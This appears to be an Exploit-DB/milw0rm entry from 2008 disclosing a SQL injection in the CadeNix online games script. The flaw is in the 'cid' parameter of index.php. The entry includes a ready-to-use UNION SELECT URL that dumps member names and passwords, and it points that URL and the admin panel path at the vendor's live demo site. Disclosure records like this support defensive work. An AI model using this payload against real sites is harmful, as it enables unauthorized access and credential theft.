Remote Sql Injection CadeNix [index.php]

vendor:

Online Games Play Online

by:

HaCkeR _EgY

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Online Games Play Online

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Remote Sql Injection CadeNix [index.php]

A SQL injection vulnerability exists in CadeNix Online Games Play Online. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords. The vulnerability is due to insufficient sanitization of user-supplied input to the 'cid' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

###################################
        Remote Sql Injection  CadeNix [ index.php ]
           CadeNix  Online Games Play Online
###################################
# I am , HaCkeR _EgY
# My Home : www.atsdp.com
# Message : Mr.SQL   Really  I miss You , see u sooon My bro :)
# Script : cadenix
# Download : http://www.cadenix.com
# Exploit :
               http://site.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
# Live Demo :
               http://cadenix.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
# Admin Panel  :   http://cadenix.com/demo/admin
####################  Greetz  ::  Abo Mohamed  #####################

# milw0rm.com [2008-12-15]